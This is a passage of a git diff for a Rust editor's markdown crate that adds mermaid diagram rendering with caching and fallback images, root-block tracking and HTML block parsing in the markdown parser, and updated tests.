Markdown::escape(" first\n second"), + [ (2), "first\n\n",  (2), "second"].concat() ); + assert_eq!(Markdown::escape("hello world"), "hello world"); + } + + #[test] + fn test_escape_leading_tabs() { + assert_eq!(Markdown::escape("\thello"), [ (4), "hello"].concat()); + assert_eq!( + Markdown::escape("hello\n\t\tindented"), + ["hello\n\n",  (8), "indented"].concat() + ); + assert_eq!( + Markdown::escape(" \t hello"), + [ (1 + 4 + 1), "hello"].concat() + ); + assert_eq!(Markdown::escape("hello\tworld"), "hello\tworld"); + } + + #[test] + fn test_escape_newlines() { + assert_eq!(Markdown::escape("a\nb"), "a\n\nb"); + assert_eq!(Markdown::escape("a\n\nb"), "a\n\n\n\nb"); + assert_eq!(Markdown::escape("\nhello"), "\n\nhello"); + } + + #[test] + fn test_escape_multiline_diagnostic() { + assert_eq!( + Markdown::escape(" | { a: string }\n | { b: number }"), + [ +  (4), + r"\| \{ a\: string \}", + "\n\n", +  (4), + r"\| \{ b\: number \}", + ] + .concat() + ); + } + + fn has_code_block(markdown: &str) -> bool { + let parsed_data = parse_markdown_with_options(markdown, false); + parsed_data + .events + .iter() + .any(|(_, event)| matches!(event, MarkdownEvent::Start(MarkdownTag::CodeBlock { .. }))) + } + + #[test] + fn test_escape_output_len_matches_precomputed() { + let cases = [ + "", + "hello world", + "hello `world`", + " hello", + " | { a: string }", + "\thello", + "hello\n\t\tindented", + " \t hello", + "hello\tworld", + "a\nb", + "a\n\nb", + "\nhello", + " | { a: string }\n | { b: number }", + "café ☕ naïve", + ]; + for input in cases { + let mut escaper = MarkdownEscaper::new(); + let precomputed: usize = input.bytes().map(|b| escaper.next(b).output_len()).sum(); + + let mut escaper = MarkdownEscaper::new(); + let mut output = String::new(); + for c in input.chars() { + escaper.next(c as u8).write_to(c, &mut output); + } + + assert_eq!(precomputed, output.len(), "length mismatch for {:?}", input); + } + } + + #[test] + fn test_escape_prevents_code_block() { + let diagnostic = " | { a: string }"; + assert!(has_code_block(diagnostic)); + assert!(!has_code_block(&Markdown::escape(diagnostic))); } #[track_caller] diff --git a/crates/markdown/src/mermaid.rs b/crates/markdown/src/mermaid.rs new file mode 100644 index 0000000000000000000000000000000000000000..b8e40ebe7ec16cbbb8d9b11ab3edfc75da46f3a9 --- /dev/null +++ b/crates/markdown/src/mermaid.rs @@ -0,0 +1,614 @@ +use collections::HashMap; +use gpui::{ + Animation, AnimationExt, AnyElement, Context, ImageSource, RenderImage, StyledText, Task, img, + pulsating_between, +}; +use std::collections::BTreeMap; +use std::ops::Range; +use std::sync::{Arc, OnceLock}; +use std::time::Duration; +use ui::prelude::*; + +use crate::parser::{CodeBlockKind, MarkdownEvent, MarkdownTag}; + +use super::{Markdown, MarkdownStyle, ParsedMarkdown}; + +type MermaidDiagramCache = HashMap>; + +#[derive(Clone, Debug)] +pub(crate) struct ParsedMarkdownMermaidDiagram { + pub(crate) content_range: Range, + pub(crate) contents: ParsedMarkdownMermaidDiagramContents, +} + +#[derive(Clone, Debug, PartialEq, Eq, Hash)] +pub(crate) struct ParsedMarkdownMermaidDiagramContents { + pub(crate) contents: SharedString, + pub(crate) scale: u32, +} + +#[derive(Default, Clone)] +pub(crate) struct MermaidState { + cache: MermaidDiagramCache, + order: Vec, +} + +struct CachedMermaidDiagram { + render_image: Arc>>>, + fallback_image: Option>, + _task: Task<()>, +} + +impl MermaidState { + pub(crate) fn clear(&mut self) { + self.cache.clear(); + self.order.clear(); + } + + fn get_fallback_image( + idx: usize, + old_order: &[ParsedMarkdownMermaidDiagramContents], + new_order_len: usize, + cache: &MermaidDiagramCache, + ) -> Option> { + if old_order.len() != new_order_len { + return None; + } + + old_order.get(idx).and_then(|old_content| { + cache.get(old_content).and_then(|old_cached| { + old_cached + .render_image + .get() + .and_then(|result| result.as_ref().ok().cloned()) + .or_else(|| old_cached.fallback_image.clone()) + }) + }) + } + + pub(crate) fn update(&mut self, parsed: &ParsedMarkdown, cx: &mut Context) { + let mut new_order = Vec::new(); + for mermaid_diagram in parsed.mermaid_diagrams.values() { + new_order.push(mermaid_diagram.contents.clone()); + } + + for (idx, new_content) in new_order.iter().enumerate() { + if !self.cache.contains_key(new_content) { + let fallback = + Self::get_fallback_image(idx, &self.order, new_order.len(), &self.cache); + self.cache.insert( + new_content.clone(), + Arc::new(CachedMermaidDiagram::new(new_content.clone(), fallback, cx)), + ); + } + } + + let new_order_set: std::collections::HashSet<_> = new_order.iter().cloned().collect(); + self.cache + .retain(|content, _| new_order_set.contains(content)); + self.order = new_order; + } +} + +impl CachedMermaidDiagram { + fn new( + contents: ParsedMarkdownMermaidDiagramContents, + fallback_image: Option>, + cx: &mut Context, + ) -> Self { + let render_image = Arc::new(OnceLock::>>::new()); + let render_image_clone = render_image.clone(); + let svg_renderer = cx.svg_renderer(); + + let task = cx.spawn(async move |this, cx| { + let value = cx + .background_spawn(async move { + let svg_string = mermaid_rs_renderer::render(&contents.contents)?; + let scale = contents.scale as f32 / 100.0; + svg_renderer + .render_single_frame(svg_string.as_bytes(), scale) + .map_err(|error| anyhow::anyhow!("{error}")) + }) + .await; + let _ = render_image_clone.set(value); + this.update(cx, |_, cx| { + cx.notify(); + }) + .ok(); + }); + + Self { + render_image, + fallback_image, + _task: task, + } + } + + #[cfg(test)] + fn new_for_test( + render_image: Option>, + fallback_image: Option>, + ) -> Self { + let result = Arc::new(OnceLock::new()); + if let Some(render_image) = render_image { + let _ = result.set(Ok(render_image)); + } + Self { + render_image: result, + fallback_image, + _task: Task::ready(()), + } + } +} + +fn parse_mermaid_info(info: &str) -> Option { + let mut parts = info.split_whitespace(); + if parts.next()? != "mermaid" { + return None; + } + + Some( + parts + .next() + .and_then(|scale| scale.parse().ok()) + .unwrap_or(100) + .clamp(10, 500), + ) +} + +pub(crate) fn extract_mermaid_diagrams( + source: &str, + events: &[(Range, MarkdownEvent)], +) -> BTreeMap { + let mut mermaid_diagrams = BTreeMap::default(); + + for (source_range, event) in events { + let MarkdownEvent::Start(MarkdownTag::CodeBlock { kind, metadata }) = event else { + continue; + }; + let CodeBlockKind::FencedLang(info) = kind else { + continue; + }; + let Some(scale) = parse_mermaid_info(info.as_ref()) else { + continue; + }; + + let contents = source[metadata.content_range.clone()] + .strip_suffix('\n') + .unwrap_or(&source[metadata.content_range.clone()]) + .to_string(); + mermaid_diagrams.insert( + source_range.start, + ParsedMarkdownMermaidDiagram { + content_range: metadata.content_range.clone(), + contents: ParsedMarkdownMermaidDiagramContents { + contents: contents.into(), + scale, + }, + }, + ); + } + + mermaid_diagrams +} + +pub(crate) fn render_mermaid_diagram( + parsed: &ParsedMarkdownMermaidDiagram, + mermaid_state: &MermaidState, + style: &MarkdownStyle, +) -> AnyElement { + let cached = mermaid_state.cache.get(&parsed.contents); + let mut container = div().w_full(); + container.style().refine(&style.code_block); + + if let Some(result) = cached.and_then(|cached| cached.render_image.get()) { + match result { + Ok(render_image) => container + .child( + div().w_full().child( + img(ImageSource::Render(render_image.clone())) + .max_w_full() + .with_fallback(|| { + div() + .child(Label::new("Failed to load mermaid diagram")) + .into_any_element() + }), + ), + ) + .into_any_element(), + Err(_) => container + .child(StyledText::new(parsed.contents.contents.clone())) + .into_any_element(), + } + } else if let Some(fallback) = cached.and_then(|cached| cached.fallback_image.as_ref()) { + container + .child( + div() + .w_full() + .child( + img(ImageSource::Render(fallback.clone())) + .max_w_full() + .with_fallback(|| { + div() + .child(Label::new("Failed to load mermaid diagram")) + .into_any_element() + }), + ) + .with_animation( + "mermaid-fallback-pulse", + Animation::new(Duration::from_secs(2)) + .repeat() + .with_easing(pulsating_between(0.6, 1.0)), + |element, delta| element.opacity(delta), + ), + ) + .into_any_element() + } else { + container + .child( + Label::new("Rendering mermaid diagram...") + .color(Color::Muted) + .with_animation( + "mermaid-loading-pulse", + Animation::new(Duration::from_secs(2)) + .repeat() + .with_easing(pulsating_between(0.4, 0.8)), + |label, delta| label.alpha(delta), + ), + ) + .into_any_element() + } +} + +#[cfg(test)] +mod tests { + use super::{ + CachedMermaidDiagram, MermaidDiagramCache, MermaidState, + ParsedMarkdownMermaidDiagramContents, extract_mermaid_diagrams, parse_mermaid_info, + }; + use crate::{ + CodeBlockRenderer, CopyButtonVisibility, Markdown, MarkdownElement, MarkdownOptions, + MarkdownStyle, + }; + use collections::HashMap; + use gpui::{Context, IntoElement, Render, RenderImage, TestAppContext, Window, size}; + use std::sync::Arc; + use ui::prelude::*; + + fn ensure_theme_initialized(cx: &mut TestAppContext) { + cx.update(|cx| { + if !cx.has_global::() { + settings::init(cx); + } + if !cx.has_global::() { + theme_settings::init(theme::LoadThemes::JustBase, cx); + } + }); + } + + fn render_markdown_with_options( + markdown: &str, + options: MarkdownOptions, + cx: &mut TestAppContext, + ) -> crate::RenderedText { + struct TestWindow; + + impl Render for TestWindow { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + div() + } + } + + ensure_theme_initialized(cx); + + let (_, cx) = cx.add_window_view(|_, _| TestWindow); + let markdown = cx.new(|cx| { + Markdown::new_with_options(markdown.to_string().into(), None, None, options, cx) + }); + cx.run_until_parked(); + let (rendered, _) = cx.draw( + Default::default(), + size(px(600.0), px(600.0)), + |_window, _cx| { + MarkdownElement::new(markdown, MarkdownStyle::default()).code_block_renderer( + CodeBlockRenderer::Default { + copy_button_visibility: CopyButtonVisibility::Hidden, + border: false, + }, + ) + }, + ); + rendered.text + } + + fn mock_render_image(cx: &mut TestAppContext) -> Arc { + cx.update(|cx| { + cx.svg_renderer() + .render_single_frame( + br#""#, + 1.0, + ) + .unwrap() + }) + } + + fn mermaid_contents(contents: &str) -> ParsedMarkdownMermaidDiagramContents { + ParsedMarkdownMermaidDiagramContents { + contents: contents.to_string().into(), + scale: 100, + } + } + + fn mermaid_sequence(diagrams: &[&str]) -> Vec { + diagrams + .iter() + .map(|diagram| mermaid_contents(diagram)) + .collect() + } + + fn mermaid_fallback( + new_diagram: &str, + new_full_order: &[ParsedMarkdownMermaidDiagramContents], + old_full_order: &[ParsedMarkdownMermaidDiagramContents], + cache: &MermaidDiagramCache, + ) -> Option> { + let new_content = mermaid_contents(new_diagram); + let idx = new_full_order + .iter() + .position(|diagram| diagram == &new_content)?; + MermaidState::get_fallback_image(idx, old_full_order, new_full_order.len(), cache) + } + + #[test] + fn test_parse_mermaid_info() { + assert_eq!(parse_mermaid_info("mermaid"), Some(100)); + assert_eq!(parse_mermaid_info("mermaid 150"), Some(150)); + assert_eq!(parse_mermaid_info("mermaid 5"), Some(10)); + assert_eq!(parse_mermaid_info("mermaid 999"), Some(500)); + assert_eq!(parse_mermaid_info("rust"), None); + } + + #[test] + fn test_extract_mermaid_diagrams_parses_scale() { + let markdown = "```mermaid 150\ngraph TD;\n```\n\n```rust\nfn main() {}\n```"; + let events = crate::parser::parse_markdown_with_options(markdown, false).events; + let diagrams = extract_mermaid_diagrams(markdown, &events); + + assert_eq!(diagrams.len(), 1); + let diagram = diagrams.values().next().unwrap(); + assert_eq!(diagram.contents.contents, "graph TD;"); + assert_eq!(diagram.contents.scale, 150); + } + + #[gpui::test] + fn test_mermaid_fallback_on_edit(cx: &mut TestAppContext) { + let old_full_order = mermaid_sequence(&["graph A", "graph B", "graph C"]); + let new_full_order = mermaid_sequence(&["graph A", "graph B modified", "graph C"]); + + let svg_b = mock_render_image(cx); + + let mut cache: MermaidDiagramCache = HashMap::default(); + cache.insert( + mermaid_contents("graph A"), + Arc::new(CachedMermaidDiagram::new_for_test( + Some(mock_render_image(cx)), + None, + )), + ); + cache.insert( + mermaid_contents("graph B"), + Arc::new(CachedMermaidDiagram::new_for_test( + Some(svg_b.clone()), + None, + )), + ); + cache.insert( + mermaid_contents("graph C"), + Arc::new(CachedMermaidDiagram::new_for_test( + Some(mock_render_image(cx)), + None, + )), + ); + + let fallback = + mermaid_fallback("graph B modified", &new_full_order, &old_full_order, &cache); + + assert_eq!(fallback.as_ref().map(|image| image.id), Some(svg_b.id)); + } + + #[gpui::test] + fn test_mermaid_no_fallback_on_add_in_middle(cx: &mut TestAppContext) { + let old_full_order = mermaid_sequence(&["graph A", "graph C"]); + let new_full_order = mermaid_sequence(&["graph A", "graph NEW", "graph C"]); + + let mut cache: MermaidDiagramCache = HashMap::default(); + cache.insert( + mermaid_contents("graph A"), + Arc::new(CachedMermaidDiagram::new_for_test( + Some(mock_render_image(cx)), + None, + )), + ); + cache.insert( + mermaid_contents("graph C"), + Arc::new(CachedMermaidDiagram::new_for_test( + Some(mock_render_image(cx)), + None, + )), + ); + + let fallback = mermaid_fallback("graph NEW", &new_full_order, &old_full_order, &cache); + + assert!(fallback.is_none()); + } + + #[gpui::test] + fn test_mermaid_fallback_chains_on_rapid_edits(cx: &mut TestAppContext) { + let old_full_order = mermaid_sequence(&["graph A", "graph B modified", "graph C"]); + let new_full_order = mermaid_sequence(&["graph A", "graph B modified again", "graph C"]); + + let original_svg = mock_render_image(cx); + + let mut cache: MermaidDiagramCache = HashMap::default(); + cache.insert( + mermaid_contents("graph A"), + Arc::new(CachedMermaidDiagram::new_for_test( + Some(mock_render_image(cx)), + None, + )), + ); + cache.insert( + mermaid_contents("graph B modified"), + Arc::new(CachedMermaidDiagram::new_for_test( + None, + Some(original_svg.clone()), + )), + ); + cache.insert( + mermaid_contents("graph C"), + Arc::new(CachedMermaidDiagram::new_for_test( + Some(mock_render_image(cx)), + None, + )), + ); + + let fallback = mermaid_fallback( + "graph B modified again", + &new_full_order, + &old_full_order, + &cache, + ); + + assert_eq!( + fallback.as_ref().map(|image| image.id), + Some(original_svg.id) + ); + } + + #[gpui::test] + fn test_mermaid_fallback_with_duplicate_blocks_edit_second(cx: &mut TestAppContext) { + let old_full_order = mermaid_sequence(&["graph A", "graph A", "graph B"]); + let new_full_order = mermaid_sequence(&["graph A", "graph A edited", "graph B"]); + + let svg_a = mock_render_image(cx); + + let mut cache: MermaidDiagramCache = HashMap::default(); + cache.insert( + mermaid_contents("graph A"), + Arc::new(CachedMermaidDiagram::new_for_test( + Some(svg_a.clone()), + None, + )), + ); + cache.insert( + mermaid_contents("graph B"), + Arc::new(CachedMermaidDiagram::new_for_test( + Some(mock_render_image(cx)), + None, + )), + ); + + let fallback = mermaid_fallback("graph A edited", &new_full_order, &old_full_order, &cache); + + assert_eq!(fallback.as_ref().map(|image| image.id), Some(svg_a.id)); + } + + #[gpui::test] + fn test_mermaid_rendering_replaces_code_block_text(cx: &mut TestAppContext) { + let rendered = render_markdown_with_options( + "```mermaid\ngraph TD;\n```", + MarkdownOptions { + render_mermaid_diagrams: true, + ..Default::default() + }, + cx, + ); + + let text = rendered + .lines + .iter() + .map(|line| line.layout.wrapped_text()) + .collect::>() + .join("\n"); + + assert!(!text.contains("graph TD;")); + } + + #[gpui::test] + fn test_mermaid_source_anchor_maps_inside_block(cx: &mut TestAppContext) { + struct TestWindow; + + impl Render for TestWindow { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + div() + } + } + + ensure_theme_initialized(cx); + + let (_, cx) = cx.add_window_view(|_, _| TestWindow); + let markdown = cx.new(|cx| { + Markdown::new_with_options( + "```mermaid\ngraph TD;\n```".into(), + None, + None, + MarkdownOptions { + render_mermaid_diagrams: true, + ..Default::default() + }, + cx, + ) + }); + cx.run_until_parked(); + let render_image = mock_render_image(cx); + markdown.update(cx, |markdown, _| { + let contents = markdown + .parsed_markdown + .mermaid_diagrams + .values() + .next() + .unwrap() + .contents + .clone(); + markdown.mermaid_state.cache.insert( + contents.clone(), + Arc::new(CachedMermaidDiagram::new_for_test(Some(render_image), None)), + ); + markdown.mermaid_state.order = vec![contents]; + }); + + let (rendered, _) = cx.draw( + Default::default(), + size(px(600.0), px(600.0)), + |_window, _cx| { + MarkdownElement::new(markdown.clone(), MarkdownStyle::default()) + .code_block_renderer(CodeBlockRenderer::Default { + copy_button_visibility: CopyButtonVisibility::Hidden, + border: false, + }) + }, + ); + + let mermaid_diagram = markdown.update(cx, |markdown, _| { + markdown + .parsed_markdown + .mermaid_diagrams + .values() + .next() + .unwrap() + .clone() + }); + assert!( + rendered + .text + .position_for_source_index(mermaid_diagram.content_range.start) + .is_some() + ); + assert!( + rendered + .text + .position_for_source_index(mermaid_diagram.content_range.end.saturating_sub(1)) + .is_some() + ); + } +} diff --git a/crates/markdown/src/parser.rs b/crates/markdown/src/parser.rs index 21738147eed1b5b02da1c85207736160bd37ceb3..6de5b16a71053f9a61a3e9c2d66d91cd962540a0 100644 --- a/crates/markdown/src/parser.rs +++ b/crates/markdown/src/parser.rs @@ -4,13 +4,13 @@ pub use pulldown_cmark::TagEnd as MarkdownTagEnd; use pulldown_cmark::{ Alignment, CowStr, HeadingLevel, LinkType, MetadataBlockKind, Options, Parser, }; -use std::{ops::Range, sync::Arc}; +use std::{collections::BTreeMap, ops::Range, sync::Arc}; use collections::HashSet; -use crate::path_range::PathWithRange; +use crate::{html, path_range::PathWithRange}; -const PARSE_OPTIONS: Options = Options::ENABLE_TABLES +pub const PARSE_OPTIONS: Options = Options::ENABLE_TABLES .union(Options::ENABLE_FOOTNOTES) .union(Options::ENABLE_STRIKETHROUGH) .union(Options::ENABLE_TASKLISTS) @@ -22,17 +22,71 @@ const PARSE_OPTIONS: Options = Options::ENABLE_TABLES .union(Options::ENABLE_SUPERSCRIPT) .union(Options::ENABLE_SUBSCRIPT); -pub fn parse_markdown( - text: &str, -) -> ( - Vec<(Range, MarkdownEvent)>, - HashSet, - HashSet>, -) { - let mut events = Vec::new(); +#[derive(Default)] +struct ParseState { + events: Vec<(Range, MarkdownEvent)>, + root_block_starts: Vec, + depth: usize, +} + +#[derive(Debug, Default)] +#[cfg_attr(test, derive(PartialEq))] +pub(crate) struct ParsedMarkdownData { + pub events: Vec<(Range, MarkdownEvent)>, + pub language_names: HashSet, + pub language_paths: HashSet>, + pub root_block_starts: Vec, + pub html_blocks: BTreeMap, +} + +impl ParseState { + fn push_event(&mut self, range: Range, event: MarkdownEvent) { + match &event { + MarkdownEvent::Start(_) => { + if self.depth == 0 { + self.root_block_starts.push(range.start); + self.events.push((range.clone(), MarkdownEvent::RootStart)); + } + self.depth += 1; + self.events.push((range, event)); + } + MarkdownEvent::End(_) => { + self.events.push((range.clone(), event)); + if self.depth > 0 { + self.depth -= 1; + if self.depth == 0 { + let root_block_index = self.root_block_starts.len() - 1; + self.events + .push((range, MarkdownEvent::RootEnd(root_block_index))); + } + } + } + MarkdownEvent::Rule => { + if self.depth == 0 && !range.is_empty() { + self.root_block_starts.push(range.start); + let root_block_index = self.root_block_starts.len() - 1; + self.events.push((range.clone(), MarkdownEvent::RootStart)); + self.events.push((range.clone(), event)); + self.events + .push((range, MarkdownEvent::RootEnd(root_block_index))); + } else { + self.events.push((range, event)); + } + } + _ => { + self.events.push((range, event)); + } + } + } +} + +pub(crate) fn parse_markdown_with_options(text: &str, parse_html: bool) -> ParsedMarkdownData { + let mut state = ParseState::default(); let mut language_names = HashSet::default(); let mut language_paths = HashSet::default(); + let mut html_blocks = BTreeMap::default(); let mut within_link = false; + let mut within_code_block = false; let mut within_metadata = false; let mut parser = Parser::new_ext(text, PARSE_OPTIONS) .into_offset_iter() @@ -48,6 +102,32 @@ pub fn parse_markdown( } match pulldown_event { pulldown_cmark::Event::Start(tag) => { + if let pulldown_cmark::Tag::HtmlBlock = &tag { + state.push_event(range.clone(), MarkdownEvent::Start(MarkdownTag::HtmlBlock)); + + if parse_html { + if let Some(block) = + html::html_parser::parse_html_block(&text[range.clone()], range.clone()) + { + html_blocks.insert(range.start, block); + + while let Some((event, end_range)) = parser.next() { + if let pulldown_cmark::Event::End( + pulldown_cmark::TagEnd::HtmlBlock, + ) = event + { + state.push_event( + end_range, + MarkdownEvent::End(MarkdownTagEnd::HtmlBlock), + ); + break; + } + } + } + } + continue; + } + let tag = match tag { pulldown_cmark::Tag::Link { link_type, @@ -63,11 +143,12 @@ pub fn parse_markdown( id: SharedString::from(id.into_string()), } } - pulldown_cmark::Tag::MetadataBlock(kind) => { + pulldown_cmark::Tag::MetadataBlock(_kind) => { within_metadata = true; - MarkdownTag::MetadataBlock(kind) + continue; } pulldown_cmark::Tag::CodeBlock(pulldown_cmark::CodeBlockKind::Indented) => { + within_code_block = true; MarkdownTag::CodeBlock { kind: CodeBlockKind::Indented, metadata: CodeBlockMetadata { @@ -79,6 +160,7 @@ pub fn parse_markdown( pulldown_cmark::Tag::CodeBlock(pulldown_cmark::CodeBlockKind::Fenced( ref info, )) => { + within_code_block = true; let content_range = extract_code_block_content_range(&text[range.clone()]); let content_range = content_range.start + range.start..content_range.end + range.start; @@ -164,20 +246,22 @@ pub fn parse_markdown( title: SharedString::from(title.into_string()), id: SharedString::from(id.into_string()), }, - pulldown_cmark::Tag::HtmlBlock => MarkdownTag::HtmlBlock, + pulldown_cmark::Tag::HtmlBlock => MarkdownTag::HtmlBlock, // this is handled above separately pulldown_cmark::Tag::DefinitionList => MarkdownTag::DefinitionList, pulldown_cmark::Tag::DefinitionListTitle => MarkdownTag::DefinitionListTitle, pulldown_cmark::Tag::DefinitionListDefinition => { MarkdownTag::DefinitionListDefinition } }; - events.push((range, MarkdownEvent::Start(tag))) + state.push_event(range, MarkdownEvent::Start(tag)) } pulldown_cmark::Event::End(tag) => { if let pulldown_cmark::TagEnd::Link = tag { within_link = false; + } else if let pulldown_cmark::TagEnd::CodeBlock = tag { + within_code_block = false; } - events.push((range, MarkdownEvent::End(tag))); + state.push_event(range, MarkdownEvent::End(tag)); } pulldown_cmark::Event::Text(parsed) => { fn event_for( @@ -191,6 +275,13 @@ pub fn parse_markdown( (range, MarkdownEvent::SubstitutedText(str.to_owned())) } } + + if within_code_block { + let (range, event) = event_for(text, range, &parsed); + state.push_event(range, event); + continue; + } + #[derive(Debug)] struct TextRange<'a> { source_range: Range, @@ -205,16 +296,26 @@ pub fn parse_markdown( parsed, }]; - while matches!(parser.peek(), Some((pulldown_cmark::Event::Text(_), _))) { - let Some((pulldown_cmark::Event::Text(next_event), next_range)) = parser.next() - else { + while matches!(parser.peek(), Some((pulldown_cmark::Event::Text(_), _))) + || (parse_html + && matches!( + parser.peek(), + Some((pulldown_cmark::Event::InlineHtml(_), _)) + )) + { + let Some((next_event, next_range)) = parser.next() else { unreachable!() }; - let next_len = last_len + next_event.len(); + let next_text = match next_event { + pulldown_cmark::Event::Text(next_event) => next_event, + pulldown_cmark::Event::InlineHtml(_) => CowStr::Borrowed(""), + _ => unreachable!(), + }; + let next_len = last_len + next_text.len(); ranges.push(TextRange { source_range: next_range.clone(), merged_range: last_len..next_len, - parsed: next_event, + parsed: next_text, }); last_len = next_len; } @@ -227,7 +328,7 @@ pub fn parse_markdown( let mut ranges = ranges.into_iter().peekable(); - if !within_link { + if !within_link && !within_code_block { let mut finder = LinkFinder::new(); finder.kinds(&[linkify::LinkKind::Url]); @@ -241,7 +342,8 @@ pub fn parse_markdown( .is_some_and(|range| range.merged_range.end <= link_start_in_merged) { let range = ranges.next().unwrap(); - events.push(event_for(text, range.source_range, &range.parsed)); + let (range, event) = event_for(text, range.source_range, &range.parsed); + state.push_event(range, event); } let Some(range) = ranges.peek_mut() else { @@ -250,11 +352,12 @@ pub fn parse_markdown( let prefix_len = link_start_in_merged - range.merged_range.start; if prefix_len > 0 { let (head, tail) = range.parsed.split_at(prefix_len); - events.push(event_for( + let (event_range, event) = event_for( text, range.source_range.start..range.source_range.start + prefix_len, head, - )); + ); + state.push_event(event_range, event); range.parsed = CowStr::Boxed(tail.into()); range.merged_range.start += prefix_len; range.source_range.start += prefix_len; @@ -290,7 +393,7 @@ pub fn parse_markdown( } let link_range = link_start_in_source..link_end_in_source; - events.push(( + state.push_event( link_range.clone(), MarkdownEvent::Start(MarkdownTag::Link { link_type: LinkType::Autolink, @@ -298,37 +401,52 @@ pub fn parse_markdown( title: SharedString::default(), id: SharedString::default(), }), - )); - events.extend(link_events); - events.push((link_range.clone(), MarkdownEvent::End(MarkdownTagEnd::Link))); + ); + for (range, event) in link_events { + state.push_event(range, event); + } + state.push_event( + link_range.clone(), + MarkdownEvent::End(MarkdownTagEnd::Link), + ); } } for range in ranges { - events.push(event_for(text, range.source_range, &range.parsed)); + let (range, event) = event_for(text, range.source_range, &range.parsed); + state.push_event(range, event); } } pulldown_cmark::Event::Code(_) => { let content_range = extract_code_content_range(&text[range.clone()]); let content_range = content_range.start + range.start..content_range.end + range.start; - events.push((content_range, MarkdownEvent::Code)) + state.push_event(content_range, MarkdownEvent::Code) + } + pulldown_cmark::Event::Html(_) => state.push_event(range, MarkdownEvent::Html), + pulldown_cmark::Event::InlineHtml(_) => { + state.push_event(range, MarkdownEvent::InlineHtml) } - pulldown_cmark::Event::Html(_) => events.push((range, MarkdownEvent::Html)), - pulldown_cmark::Event::InlineHtml(_) => events.push((range, MarkdownEvent::InlineHtml)), pulldown_cmark::Event::FootnoteReference(_) => { - events.push((range, MarkdownEvent::FootnoteReference)) + state.push_event(range, MarkdownEvent::FootnoteReference) } - pulldown_cmark::Event::SoftBreak => events.push((range, MarkdownEvent::SoftBreak)), - pulldown_cmark::Event::HardBreak => events.push((range, MarkdownEvent::HardBreak)), - pulldown_cmark::Event::Rule => events.push((range, MarkdownEvent::Rule)), + pulldown_cmark::Event::SoftBreak => state.push_event(range, MarkdownEvent::SoftBreak), + pulldown_cmark::Event::HardBreak => state.push_event(range, MarkdownEvent::HardBreak), + pulldown_cmark::Event::Rule => state.push_event(range, MarkdownEvent::Rule), pulldown_cmark::Event::TaskListMarker(checked) => { - events.push((range, MarkdownEvent::TaskListMarker(checked))) + state.push_event(range, MarkdownEvent::TaskListMarker(checked)) } pulldown_cmark::Event::InlineMath(_) | pulldown_cmark::Event::DisplayMath(_) => {} } } - (events, language_names, language_paths) + + ParsedMarkdownData { + events: state.events, + language_names, + language_paths, + root_block_starts: state.root_block_starts, + html_blocks, + } } pub fn parse_links_only(text: &str) -> Vec<(Range, MarkdownEvent)> { @@ -401,6 +519,10 @@ pub enum MarkdownEvent { Rule, /// A task list marker, rendered as a checkbox in HTML. Contains a true when it is checked. TaskListMarker(bool), + /// Start of a root-level block (a top-level structural element like a paragraph, heading, list, etc.). + RootStart, + /// End of a root-level block. Contains the root block index. + RootEnd(usize), } /// Tags for elements that can contain other elements. @@ -575,31 +697,39 @@ mod tests { #[test] fn test_html_comments() { assert_eq!( - parse_markdown(" \nReturns"), - ( - vec![ + parse_markdown_with_options(" \nReturns", false), + ParsedMarkdownData { + events: vec![ + (2..30, RootStart), (2..30, Start(HtmlBlock)), (2..2, SubstitutedText(" ".into())), (2..7, Html), (7..26, Html), (26..30, Html), (2..30, End(MarkdownTagEnd::HtmlBlock)), + (2..30, RootEnd(0)), + (30..37, RootStart), (30..37, Start(Paragraph)), (30..37, Text), - (30..37, End(MarkdownTagEnd::Paragraph)) + (30..37, End(MarkdownTagEnd::Paragraph)), + (30..37, RootEnd(1)), ], - HashSet::default(), - HashSet::default() - ) + root_block_starts: vec![2, 30], + ..Default::default() + } ) } #[test] fn test_plain_urls_and_escaped_text() { assert_eq!( - parse_markdown("   https://some.url some \\`►\\` text"), - ( - vec![ + parse_markdown_with_options( + "   https://some.url some \\`►\\` text", + false + ), + ParsedMarkdownData { + events: vec![ + (0..51, RootStart), (0..51, Start(Paragraph)), (0..6, SubstitutedText("\u{a0}".into())), (6..12, SubstitutedText("\u{a0}".into())), @@ -620,19 +750,25 @@ mod tests { (37..44, SubstitutedText("►".into())), (45..46, Text), // Escaped backtick (46..51, Text), - (0..51, End(MarkdownTagEnd::Paragraph)) + (0..51, End(MarkdownTagEnd::Paragraph)), + (0..51, RootEnd(0)), ], - HashSet::default(), - HashSet::default() - ) + root_block_starts: vec![0], + ..Default::default() + } ); } #[test] fn test_incomplete_link() { assert_eq!( - parse_markdown("You can use the [GitHub Search API](https://docs.github.com/en").0, + parse_markdown_with_options( + "You can use the [GitHub Search API](https://docs.github.com/en", + false + ) + .events, vec![ + (0..62, RootStart), (0..62, Start(Paragraph)), (0..16, Text), (16..17, Text), @@ -650,7 +786,8 @@ mod tests { ), (36..62, Text), (36..62, End(MarkdownTagEnd::Link)), - (0..62, End(MarkdownTagEnd::Paragraph)) + (0..62, End(MarkdownTagEnd::Paragraph)), + (0..62, RootEnd(0)), ], ); } @@ -658,9 +795,13 @@ mod tests { #[test] fn test_smart_punctuation() { assert_eq!( - parse_markdown("-- --- ... \"double quoted\" 'single quoted' ----------"), - ( - vec![ + parse_markdown_with_options( + "-- --- ... \"double quoted\" 'single quoted' ----------", + false + ), + ParsedMarkdownData { + events: vec![ + (0..53, RootStart), (0..53, Start(Paragraph)), (0..2, SubstitutedText("–".into())), (2..3, Text), @@ -668,29 +809,31 @@ mod tests { (6..7, Text), (7..10, SubstitutedText("…".into())), (10..11, Text), - (11..12, SubstitutedText("“".into())), + (11..12, SubstitutedText("\u{201c}".into())), (12..25, Text), - (25..26, SubstitutedText("”".into())), + (25..26, SubstitutedText("\u{201d}".into())), (26..27, Text), - (27..28, SubstitutedText("‘".into())), + (27..28, SubstitutedText("\u{2018}".into())), (28..41, Text), - (41..42, SubstitutedText("’".into())), + (41..42, SubstitutedText("\u{2019}".into())), (42..43, Text), (43..53, SubstitutedText("–––––".into())), - (0..53, End(MarkdownTagEnd::Paragraph)) + (0..53, End(MarkdownTagEnd::Paragraph)), + (0..53, RootEnd(0)), ], - HashSet::default(), - HashSet::default() - ) + root_block_starts: vec![0], + ..Default::default() + } ) } #[test] fn test_code_block_metadata() { assert_eq!( - parse_markdown("```rust\nfn main() {\n let a = 1;\n}\n```"), - ( - vec![ + parse_markdown_with_options("```rust\nfn main() {\n let a = 1;\n}\n```", false), + ParsedMarkdownData { + events: vec![ + (0..37, RootStart), ( 0..37, 